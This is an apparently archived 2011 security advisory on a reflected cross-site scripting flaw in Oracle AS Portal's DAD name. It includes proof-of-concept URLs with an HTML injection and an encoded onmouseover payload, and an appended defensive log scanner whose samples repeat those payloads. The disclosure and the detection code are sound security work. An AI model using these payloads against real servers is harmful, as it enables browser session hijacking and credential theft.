
Oracle AS Portal 10.1.2 Cross Site Scripting

02 May 2011 | Reported by Vicente Aguilera Diaz | Type: packetstorm | Source: packetstormsecurity.com

Oracle AS Portal 10.1.2 XSS Vulnerability in Database Access Descripto

Code
`=============================================  
INTERNET SECURITY AUDITORS ALERT 2010-007  
- Original release date: August 11th, 2010  
- Last revised: May 1st, 2011  
- Discovered by: Vicente Aguilera Diaz  
- Severity: 5.0/10 (CVSS Base Score)  
=============================================  
  
I. VULNERABILITY  
-------------------------  
XSS in Oracle Portal Database Access Descriptor  
  
II. BACKGROUND  
-------------------------  
Oracle AS Portal is a Web-based application for building and deploying  
portals. It provides a secure, manageable environment for accessing  
and interacting with enterprise software services and information  
resources.  
  
III. DESCRIPTION  
-------------------------  
A reflected XSS vulnerability has been detected in Oracle Application  
Server that allows arbitrary HTML/script code to be executed in the  
context of the victim user's browser.  
  
The code injection is done through the DAD name. A DAD (Database  
Access Descriptor) is a set of values that specifies how a database  
server should fulfill an HTTP request.  
  
IV. PROOF OF CONCEPT  
-------------------------  
Original request:  
http://<oracle-application-server>/portal/pls/<DAD>  
  
Malicious request:  
http://<oracle-application-server>/portal/pls/<XSS injection>  
  
Example 1:  
http://<oracle-application-server>/portal/pls/"<H1>XSS vulnerability<XSS  
  
In this scenario, the attacker has the difficulty of being unable to  
close the HTML tag because the character "/" cannot be added as part  
of the code injection (DAD name). However, it is possible to generate  
that character without it appearing in the injection. Below is an example.  
  
Example 2:  
http://<oracle-application-server>/portal/pls/"<img src=""  
onmouseover="document.body.innerHTML=String.fromCharCode(60,72,84,77,76,62,60,72,49,62,88,83,83,60,47,72,49,62,32,60,72,50,62,86,85,76,78,60,47,72,50,62);"><XSS  
  
V. BUSINESS IMPACT  
-------------------------  
An attacker can execute arbitrary HTML or script code in a targeted  
user's browser. This can be leveraged to steal sensitive information  
such as user credentials, personal data, etc.  
  
VI. SYSTEMS AFFECTED  
-------------------------  
Tested in Oracle Application Server Portal (Oracle AS Portal) 10g,  
version 10.1.2. Other versions may be affected too.  
  
VII. SOLUTION  
-------------------------  
Install the latest CPU (Critical Patch Update).  
  
VIII. REFERENCES  
-------------------------  
http://www.oracle.com  
http://www.isecauditors.com  
  
IX. CREDITS  
-------------------------  
This vulnerability has been discovered  
by Vicente Aguilera Diaz (vaguilera (at) isecauditors (dot) com).  
  
X. REVISION HISTORY  
-------------------------  
August 11, 2010: Initial release  
May 01, 2011: Final revision  
  
XI. DISCLOSURE TIMELINE  
-------------------------  
August 11, 2010: Discovered by Internet Security Auditors  
August 11, 2010: Oracle contacted including PoC.  
August 12, 2010: Oracle informs that it will investigate  
the vulnerability.  
April 19, 2011: Oracle fixed the vulnerability in the  
CPU (Critical Patch Update).  
May 01, 2011: Sent to lists.  
  
XII. LEGAL NOTICES  
-------------------------  
The information contained within this advisory is supplied "as-is"  
with no warranties or guarantees of fitness of use or otherwise.  
Internet Security Auditors accepts no responsibility for any damage  
caused by the use or misuse of this information.  
  
XIII. ABOUT  
-------------------------  
Internet Security Auditors is a Spain-based leader in web application  
testing, network security, penetration testing, security compliance  
implementation and assessing. Our clients include some of the largest  
companies in areas such as finance, telecommunications, insurance,  
ITC, etc. We are a vendor-independent provider with deep expertise  
since 2001. Our efforts in R&D include vulnerability research, open  
security project collaboration and whitepapers, presentations and  
security events participation and promotion. For further information  
regarding our security services, contact us.  
`
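
A defender-side check for the issue the advisory describes, as an added example that is not part of the original advisory or of Oracle's fix: it scans access-log lines for `/portal/pls/` requests whose DAD segment does not look like a DAD name (undoing nested percent-encoding first) and shows the segment HTML-encoded before it is reflected. The DAD-name allowlist, the error-page template and the log lines are assumptions constructed for illustration.

```python
import html
import re
from urllib.parse import unquote, urlsplit

PLS_PREFIX = "/portal/pls/"  # path shown in the advisory
# Assumption: DAD names on this server use only letters, digits and underscores.
DAD_NAME = re.compile(r"[A-Za-z0-9_]{1,64}")
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

def dad_segment(target):
    """Return the decoded DAD path segment of a request target, or None."""
    path = urlsplit(target).path
    if not path.lower().startswith(PLS_PREFIX):
        return None
    seg = path[len(PLS_PREFIX):].split("/", 1)[0]
    if not seg:
        return None
    for _ in range(3):  # undo nested percent-encoding such as %253C
        decoded = unquote(seg)
        if decoded == seg:
            break
        seg = decoded
    return seg

def flag_lines(lines):
    """Return (line number, decoded DAD) for requests with a non-conforming DAD."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        seg = dad_segment(match.group(1)) if match else None
        if seg is not None and not DAD_NAME.fullmatch(seg):
            hits.append((number, seg))
    return hits

def render_unknown_dad(dad):
    """Hypothetical error page: the DAD name is HTML-encoded before reflection."""
    return "<p>Unknown DAD: " + html.escape(dad, quote=True) + "</p>"

# Constructed access-log lines (Common Log Format), not taken from a real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [02/May/2011:10:00:01 +0000] "GET /portal/pls/portal/home HTTP/1.1" 200 5120',
    '192.0.2.11 - - [02/May/2011:10:00:07 +0000] "GET /portal/pls/%22%3CH1%3EXSS%20vulnerability%3CXSS HTTP/1.1" 404 312',
    '192.0.2.12 - - [02/May/2011:10:00:09 +0000] "GET /portal/pls/%2522%253Cimg%2520src HTTP/1.1" 404 298',
    '192.0.2.13 - - [02/May/2011:10:00:12 +0000] "GET /index.html HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for number, seg in flag_lines(SAMPLE_LOG):
        print(number, repr(seg), "->", render_unknown_dad(seg))
```

The allowlist should be replaced with the DAD names actually configured on the server; a stricter check compares the segment against that exact list.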
